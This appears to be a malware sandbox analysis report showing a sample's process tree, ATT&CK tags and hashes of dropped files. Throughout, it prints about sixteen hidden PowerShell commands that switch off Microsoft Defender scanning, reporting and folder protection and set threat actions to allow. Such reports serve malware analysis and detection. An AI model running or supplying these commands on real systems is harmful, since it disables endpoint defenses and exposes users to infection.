C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableBehaviorMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableBlockAtFirstSeen $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableIOAVProtection $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisablePrivacyMode $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableArchiveScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -DisableScriptScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -SubmitSamplesConsent 2 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -MAPSReporting 0 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -HighThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -LowThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -SevereThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-MpPreference -EnableControlledFolderAccess Disabled -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize252B
MD5c829b1ff6928df0fda16df93de68ca4e
SHA1556fdaa060a68fb34271b78531ea85cb9d018b5e
SHA256c1fcc2329a1bdb8ffb8808a07da3ca8307a9eaf3e65eb07db6903a3421c10d21
SHA5125b2778e5e045f6c4499401e4c988accff3ce017a021404f4e1691e09c4afa0ce8210bc7b28ce72abeea2a9f95649eafb9415b7b6630833f84b7e59a74a6adaa6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5a22e33018f26dcdbd34416363a156665
SHA1ef87e786befec5cd8684d2655b209a917107ae5b
SHA2568416a73af3edc69a6f90ca68d9f08928076ab20d7816608f400df36b5e3f999c
SHA5120c8d14915ca1f05d9ed27b88bdf3c74b4839846ae0ffd32966a140a7aa1f97a00430abe7d75ae2498475817f14c627b188756ecf827234691f0cf0012028a00d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD52ee7385f1b23a60101bd947f1d40beea
SHA1ecf96b80c24b28179fa017729e2f519ad03b0bd5
SHA256cdb825a7381d34dd88dde39f7245fab0156a43804a730f76881de0448f1e56fa
SHA512f1c269865da9dd456ed993e53f51aafc0845e499a25a02d7dc869948a0b869704fae9acdd2a8c5d29ab70c30cef57dd71b45575d27864235848b89a213604ada
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5134668a91efa55e0dd71180a28159453
SHA16eb72dfa583e855874985fefb2d738e319c26aea
SHA2560a7b0313a42eb81ad0a1b1df6dcfe713363d3a0faa187d6926326e6ce1a3e710
SHA5126f89874783ed7632523aea2b9e15094a5ddc40dba24421c51ff48d64828980a7d9de894c7740c40755200725d650f5a02f128d5f0811f30b6599572d5be81036